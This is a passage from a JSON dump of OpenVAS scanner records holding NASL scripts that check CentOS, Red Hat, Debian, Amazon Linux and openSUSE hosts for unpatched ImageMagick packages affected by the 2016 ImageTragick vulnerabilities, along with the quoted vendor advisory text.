Please take additional precautions to ensure that your\napplications using the ImageMagick library do not process malicious or\nuntrusted files before doing so.\");\n script_tag(name:\"affected\", value:\"ImageMagick on CentOS 7\");\n script_tag(name:\"solution\", value:\"Please install the updated packages.\");\n\n script_xref(name:\"CESA\", value:\"2016:0726\");\n script_xref(name:\"URL\", value:\"http://lists.centos.org/pipermail/centos-announce/2016-May/021866.html\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_family(\"CentOS Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/centos\", \"ssh/login/rpms\", re:\"ssh/login/release=CentOS7\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"CentOS7\")\n{\n\n if ((res = isrpmvuln(pkg:\"ImageMagick\", rpm:\"ImageMagick~6.7.8.9~13.el7_2\", rls:\"CentOS7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"ImageMagick-c++\", rpm:\"ImageMagick-c++~6.7.8.9~13.el7_2\", rls:\"CentOS7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"ImageMagick-c++-devel\", rpm:\"ImageMagick-c++-devel~6.7.8.9~13.el7_2\", rls:\"CentOS7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"ImageMagick-devel\", rpm:\"ImageMagick-devel~6.7.8.9~13.el7_2\", rls:\"CentOS7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"ImageMagick-doc\", rpm:\"ImageMagick-doc~6.7.8.9~13.el7_2\", rls:\"CentOS7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"ImageMagick-perl\", rpm:\"ImageMagick-perl~6.7.8.9~13.el7_2\", rls:\"CentOS7\")) != 
NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:35:32", "description": "The remote host is missing an update for the 'ImageMagick' package(s) announced via the referenced advisory.", "cvss3": {}, "published": "2016-05-10T00:00:00", "type": "openvas", "title": "RedHat Update for ImageMagick RHSA-2016:0726-01", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-3715", "CVE-2016-3716", "CVE-2016-3714", "CVE-2016-3718", "CVE-2016-3717"], "modified": "2018-11-23T00:00:00", "id": "OPENVAS:1361412562310871609", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310871609", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# RedHat Update for ImageMagick RHSA-2016:0726-01\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2016 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.871609\");\n script_version(\"$Revision: 12497 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-11-23 09:28:21 +0100 (Fri, 23 Nov 2018) $\");\n script_tag(name:\"creation_date\", value:\"2016-05-10 05:19:03 +0200 (Tue, 10 May 2016)\");\n script_cve_id(\"CVE-2016-3714\", \"CVE-2016-3715\", \"CVE-2016-3716\", \"CVE-2016-3717\",\n \"CVE-2016-3718\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"RedHat Update for ImageMagick RHSA-2016:0726-01\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'ImageMagick'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"insight\", value:\"ImageMagick is an image display and\nmanipulation tool for the X Window System that can read and write multiple\nimage formats.\n\nSecurity Fix(es):\n\n * It was discovered that ImageMagick did not properly sanitize certain\ninput before passing it to the delegate functionality. A remote attacker\ncould create a specially crafted image that, when processed by an\napplication using ImageMagick or an unsuspecting user using the ImageMagick\nutilities, would lead to arbitrary execution of shell commands with the\nprivileges of the user running the application. 
(CVE-2016-3714)\n\n * It was discovered that certain ImageMagick coders and pseudo-protocols\ndid not properly prevent security sensitive operations when processing\nspecially crafted images. A remote attacker could create a specially\ncrafted image that, when processed by an application using ImageMagick or\nan unsuspecting user using the ImageMagick utilities, would allow the\nattacker to delete, move, or disclose the contents of arbitrary files.\n(CVE-2016-3715, CVE-2016-3716, CVE-2016-3717)\n\n * A server-side request forgery flaw was discovered in the way ImageMagick\nprocessed certain images. A remote attacker could exploit this flaw to\nmislead an application using ImageMagick or an unsuspecting user using the\nImageMagick utilities into, for example, performing HTTP(S) requests or\nopening FTP sessions via specially crafted images. (CVE-2016-3718)\n\nNote: This update contains an updated /etc/ImageMagick/policy.xml file that\ndisables the EPHEMERAL, HTTPS, HTTP, URL, FTP, MVG, MSL, TEXT, and LABEL\ncoders. If you experience any problems after the update, it may be\nnecessary to manually adjust the policy.xml file to match your\nrequirements. Please take additional precautions to ensure that your\napplications using the ImageMagick library do not process malicious or\nuntrusted files before doing so.\");\n script_tag(name:\"affected\", value:\"ImageMagick on Red Hat Enterprise Linux Desktop (v. 6),\n Red Hat Enterprise Linux Server (v. 6),\n Red Hat Enterprise Linux Server (v. 7),\n Red Hat Enterprise Linux Workstation (v. 
6)\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n\n script_xref(name:\"RHSA\", value:\"2016:0726-01\");\n script_xref(name:\"URL\", value:\"https://www.redhat.com/archives/rhsa-announce/2016-May/msg00010.html\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_family(\"Red Hat Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/rhel\", \"ssh/login/rpms\", re:\"ssh/login/release=RHENT_(7|6)\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release) exit(0);\n\nres = \"\";\n\nif(release == \"RHENT_7\")\n{\n\n if ((res = isrpmvuln(pkg:\"ImageMagick\", rpm:\"ImageMagick~6.7.8.9~13.el7_2\", rls:\"RHENT_7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"ImageMagick-c++\", rpm:\"ImageMagick-c++~6.7.8.9~13.el7_2\", rls:\"RHENT_7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"ImageMagick-debuginfo\", rpm:\"ImageMagick-debuginfo~6.7.8.9~13.el7_2\", rls:\"RHENT_7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"ImageMagick-perl\", rpm:\"ImageMagick-perl~6.7.8.9~13.el7_2\", rls:\"RHENT_7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n\n\nif(release == \"RHENT_6\")\n{\n\n if ((res = isrpmvuln(pkg:\"ImageMagick\", rpm:\"ImageMagick~6.7.2.7~4.el6_7\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"ImageMagick-c++\", rpm:\"ImageMagick-c++~6.7.2.7~4.el6_7\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"ImageMagick-debuginfo\", rpm:\"ImageMagick-debuginfo~6.7.2.7~4.el6_7\", 
rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2017-07-24T12:54:51", "description": "Nikolay Ermishkin from the Mail.Ru Security\nTeam and Stewie discovered several vulnerabilities in ImageMagick, a program suite for\nimage manipulation. These vulnerabilities, collectively known as ImageTragick,\nare the consequence of lack of sanitization of untrusted input. An\nattacker with control over the image input could, with the privileges of\nthe user running the application, execute code\n(CVE-2016-3714), make HTTP\nGET or FTP requests (CVE-2016-3718),\nor delete (CVE-2016-3715), move\n(CVE-2016-3716), or read\n(CVE-2016-3717) local files.\n\nThese vulnerabilities are particularly critical if ImageMagick processes\nimages coming from remote parties, such as part of a web service.\n\nThe update disables the vulnerable coders (EPHEMERAL, URL, MVG, MSL, and\nPLT) and indirect reads via /etc/ImageMagick-6/policy.xml file. 
In\naddition, we introduce extra preventions, including some sanitization for\ninput filenames in http/https delegates, the full removal of PLT/Gnuplot\ndecoder, and the need of explicit reference in the filename for the\ninsecure coders.", "cvss3": {}, "published": "2016-05-16T00:00:00", "type": "openvas", "title": "Debian Security Advisory DSA 3580-1 (imagemagick - security update)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-3715", "CVE-2016-3716", "CVE-2016-3714", "CVE-2016-3718", "CVE-2016-3717"], "modified": "2017-07-07T00:00:00", "id": "OPENVAS:703580", "href": "http://plugins.openvas.org/nasl.php?oid=703580", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: deb_3580.nasl 6608 2017-07-07 12:05:05Z cfischer $\n# Auto-generated from advisory DSA 3580-1 using nvtgen 1.0\n# Script version: 1.0\n#\n# Author:\n# Greenbone Networks\n#\n# Copyright:\n# Copyright (c) 2016 Greenbone Networks GmbH http://greenbone.net\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\n\nif(description)\n{\n script_id(703580);\n script_version(\"$Revision: 6608 $\");\n script_cve_id(\"CVE-2016-3714\", \"CVE-2016-3715\", \"CVE-2016-3716\", \"CVE-2016-3717\",\n \"CVE-2016-3718\");\n script_name(\"Debian Security Advisory DSA 3580-1 (imagemagick - security update)\");\n script_tag(name: \"last_modification\", value: \"$Date: 2017-07-07 14:05:05 +0200 (Fri, 07 Jul 2017) $\");\n script_tag(name: \"creation_date\", value: \"2016-05-16 00:00:00 +0200 (Mon, 16 May 2016)\");\n script_tag(name: \"cvss_base\", value: \"10.0\");\n script_tag(name: \"cvss_base_vector\", value: \"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name: \"solution_type\", value: \"VendorFix\");\n script_tag(name: \"qod_type\", value: \"package\");\n\n script_xref(name: \"URL\", value: \"http://www.debian.org/security/2016/dsa-3580.html\");\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2016 Greenbone Networks GmbH http://greenbone.net\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\");\n script_tag(name: \"affected\", value: \"imagemagick on Debian Linux\");\n script_tag(name: \"insight\", value: \"ImageMagick is a software suite\nto create, edit, and compose bitmap images. It can read, convert and write\nimages in a variety of formats (over 100) including DPX, EXR, GIF, JPEG, JPEG-2000,\nPDF, PhotoCD, PNG, Postscript, SVG, and TIFF. 
Use ImageMagick to translate, flip,\nmirror, rotate, scale, shear and transform images, adjust image colors, apply various\nspecial effects, or draw text, lines, polygons, ellipses and Bzier curves.\nAll manipulations can be achieved through shell commands as well as through\nan X11 graphical interface (display).\");\n script_tag(name: \"solution\", value: \"For the stable distribution (jessie), these\nproblems have been fixed in version 8:6.8.9.9-5+deb8u2.\n\nWe recommend that you upgrade your imagemagick packages.\");\n script_tag(name: \"summary\", value: \"Nikolay Ermishkin from the Mail.Ru Security\nTeam and Stewie discovered several vulnerabilities in ImageMagick, a program suite for\nimage manipulation. These vulnerabilities, collectively known as ImageTragick,\nare the consequence of lack of sanitization of untrusted input. An\nattacker with control on the image input could, with the privileges of\nthe user running the application, execute code\n(CVE-2016-3714), make HTTP\nGET or FTP requests (CVE-2016-3718),\nor delete (CVE-2016-3715), move\n(CVE-2016-3716), or read\n(CVE-2016-3717 \n) local files.\n\nThese vulnerabilities are particularly critical if Imagemagick processes\nimages coming from remote parties, such as part of a web service.\n\nThe update disables the vulnerable coders (EPHEMERAL, URL, MVG, MSL, and\nPLT) and indirect reads via /etc/ImageMagick-6/policy.xml file. 
In\naddition, we introduce extra preventions, including some sanitization for\ninput filenames in http/https delegates, the full remotion of PLT/Gnuplot\ndecoder, and the need of explicit reference in the filename for the\ninsecure coders.\");\n script_tag(name: \"vuldetect\", value: \"This check tests the installed software\nversion using the apt package manager.\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isdpkgvuln(pkg:\"imagemagick\", ver:\"8:6.8.9.9-5+deb8u2\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"imagemagick-6.q16\", ver:\"8:6.8.9.9-5+deb8u2\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"imagemagick-common\", ver:\"8:6.8.9.9-5+deb8u2\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"imagemagick-dbg:amd64\", ver:\"8:6.8.9.9-5+deb8u2\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"imagemagick-dbg:i386\", ver:\"8:6.8.9.9-5+deb8u2\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"imagemagick-doc\", ver:\"8:6.8.9.9-5+deb8u2\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libimage-magick-perl\", ver:\"8:6.8.9.9-5+deb8u2\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libimage-magick-q16-perl\", ver:\"8:6.8.9.9-5+deb8u2\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libmagick++-6-headers\", ver:\"8:6.8.9.9-5+deb8u2\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libmagick++-6.q16-5:amd64\", ver:\"8:6.8.9.9-5+deb8u2\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libmagick++-6.q16-5:i386\", ver:\"8:6.8.9.9-5+deb8u2\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n 
report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libmagick++-6.q16-dev:amd64\", ver:\"8:6.8.9.9-5+deb8u2\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libmagick++-6.q16-dev:i386\", ver:\"8:6.8.9.9-5+deb8u2\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libmagick++-dev\", ver:\"8:6.8.9.9-5+deb8u2\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libmagickcore-6-arch-config:amd64\", ver:\"8:6.8.9.9-5+deb8u2\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libmagickcore-6-arch-config:i386\", ver:\"8:6.8.9.9-5+deb8u2\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libmagickcore-6-headers\", ver:\"8:6.8.9.9-5+deb8u2\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libmagickcore-6.q16-2:amd64\", ver:\"8:6.8.9.9-5+deb8u2\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libmagickcore-6.q16-2:i386\", ver:\"8:6.8.9.9-5+deb8u2\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\n\nif ((res = isdpkgvuln(pkg:\"libmagickcore-6.q16-2-extra:amd64\", ver:\"8:6.8.9.9-5+deb8u2\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libmagickcore-6.q16-2-extra:i386\", ver:\"8:6.8.9.9-5+deb8u2\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\n\nif ((res = isdpkgvuln(pkg:\"libmagickcore-6.q16-dev:amd64\", ver:\"8:6.8.9.9-5+deb8u2\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libmagickcore-6.q16-dev:i386\", ver:\"8:6.8.9.9-5+deb8u2\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\n\nif ((res = isdpkgvuln(pkg:\"libmagickcore-dev\", ver:\"8:6.8.9.9-5+deb8u2\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libmagickwand-6-headers\", 
ver:\"8:6.8.9.9-5+deb8u2\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libmagickwand-6.q16-2:amd64\", ver:\"8:6.8.9.9-5+deb8u2\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libmagickwand-6.q16-2:i386\", ver:\"8:6.8.9.9-5+deb8u2\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\n\nif ((res = isdpkgvuln(pkg:\"libmagickwand-6.q16-dev:amd64\", ver:\"8:6.8.9.9-5+deb8u2\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libmagickwand-6.q16-dev:i386\", ver:\"8:6.8.9.9-5+deb8u2\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\n\nif ((res = isdpkgvuln(pkg:\"libmagickwand-dev\", ver:\"8:6.8.9.9-5+deb8u2\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"perlmagick\", ver:\"8:6.8.9.9-5+deb8u2\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2020-03-17T22:57:02", "description": "The remote host is missing an update announced via the referenced Security Advisory.", "cvss3": {}, "published": "2016-10-26T00:00:00", "type": "openvas", "title": "Amazon Linux: Security Advisory (ALAS-2016-699)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-3715", "CVE-2016-3716", "CVE-2016-3714", "CVE-2016-3718", "CVE-2016-3717"], "modified": "2020-03-13T00:00:00", "id": "OPENVAS:1361412562310120688", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310120688", "sourceData": "# Copyright (C) 2016 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) of their respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can 
redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.120688\");\n script_version(\"2020-03-13T13:19:50+0000\");\n script_tag(name:\"creation_date\", value:\"2016-10-26 15:38:07 +0300 (Wed, 26 Oct 2016)\");\n script_tag(name:\"last_modification\", value:\"2020-03-13 13:19:50 +0000 (Fri, 13 Mar 2020)\");\n script_name(\"Amazon Linux: Security Advisory (ALAS-2016-699)\");\n script_tag(name:\"insight\", value:\"Multiple flaws were found in ImageMagick. 
Please see the references for more information.\");\n script_tag(name:\"solution\", value:\"Run yum update ImageMagick to update your system.\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"URL\", value:\"https://alas.aws.amazon.com/ALAS-2016-699.html\");\n script_cve_id(\"CVE-2016-3718\", \"CVE-2016-3717\", \"CVE-2016-3716\", \"CVE-2016-3715\", \"CVE-2016-3714\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/amazon_linux\", \"ssh/login/release\");\n script_category(ACT_GATHER_INFO);\n script_tag(name:\"summary\", value:\"The remote host is missing an update announced via the referenced Security Advisory.\");\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_family(\"Amazon Linux Local Security Checks\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"AMAZON\") {\n if(!isnull(res = isrpmvuln(pkg:\"ImageMagick-doc\", rpm:\"ImageMagick-doc~6.7.8.9~13.19.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"ImageMagick-perl\", rpm:\"ImageMagick-perl~6.7.8.9~13.19.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"ImageMagick-c++\", rpm:\"ImageMagick-c++~6.7.8.9~13.19.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"ImageMagick\", rpm:\"ImageMagick~6.7.8.9~13.19.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"ImageMagick-debuginfo\", rpm:\"ImageMagick-debuginfo~6.7.8.9~13.19.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"ImageMagick-devel\", 
rpm:\"ImageMagick-devel~6.7.8.9~13.19.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"ImageMagick-c++-devel\", rpm:\"ImageMagick-c++-devel~6.7.8.9~13.19.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if(__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-01-31T18:35:18", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2016-05-08T00:00:00", "type": "openvas", "title": "openSUSE: Security Advisory for ImageMagick (openSUSE-SU-2016:1261-1)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-3715", "CVE-2016-3716", "CVE-2016-3714", "CVE-2016-3718", "CVE-2016-3717"], "modified": "2020-01-31T00:00:00", "id": "OPENVAS:1361412562310851304", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310851304", "sourceData": "# Copyright (C) 2016 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) of their respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.851304\");\n script_version(\"2020-01-31T08:23:39+0000\");\n script_tag(name:\"last_modification\", value:\"2020-01-31 08:23:39 +0000 (Fri, 31 Jan 2020)\");\n script_tag(name:\"creation_date\", value:\"2016-05-08 05:19:07 +0200 (Sun, 08 May 2016)\");\n script_cve_id(\"CVE-2016-3714\", \"CVE-2016-3715\", \"CVE-2016-3716\", \"CVE-2016-3717\",\n \"CVE-2016-3718\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"openSUSE: Security Advisory for ImageMagick (openSUSE-SU-2016:1261-1)\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'ImageMagick'\n package(s) announced via the referenced advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"This update for ImageMagick fixes the following issues:\n\n The update disables various insecure coders [boo#978061] These fix issues\n tracked in CVE-2016-3714, CVE-2016-3715, CVE-2016-3716, CVE-2016-3717,\n CVE-2016-3718\");\n\n script_tag(name:\"affected\", value:\"ImageMagick on openSUSE 13.2\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_xref(name:\"openSUSE-SU\", value:\"2016:1261-1\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_family(\"SuSE Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n 
script_mandatory_keys(\"ssh/login/suse\", \"ssh/login/rpms\", re:\"ssh/login/release=openSUSE13\\.2\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"openSUSE13.2\")\n{\n\n if(!isnull(res = isrpmvuln(pkg:\"ImageMagick\", rpm:\"ImageMagick~6.8.9.8~18.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"ImageMagick-debuginfo\", rpm:\"ImageMagick-debuginfo~6.8.9.8~18.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"ImageMagick-debugsource\", rpm:\"ImageMagick-debugsource~6.8.9.8~18.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"ImageMagick-devel\", rpm:\"ImageMagick-devel~6.8.9.8~18.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"ImageMagick-extra\", rpm:\"ImageMagick-extra~6.8.9.8~18.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"ImageMagick-extra-debuginfo\", rpm:\"ImageMagick-extra-debuginfo~6.8.9.8~18.1\", 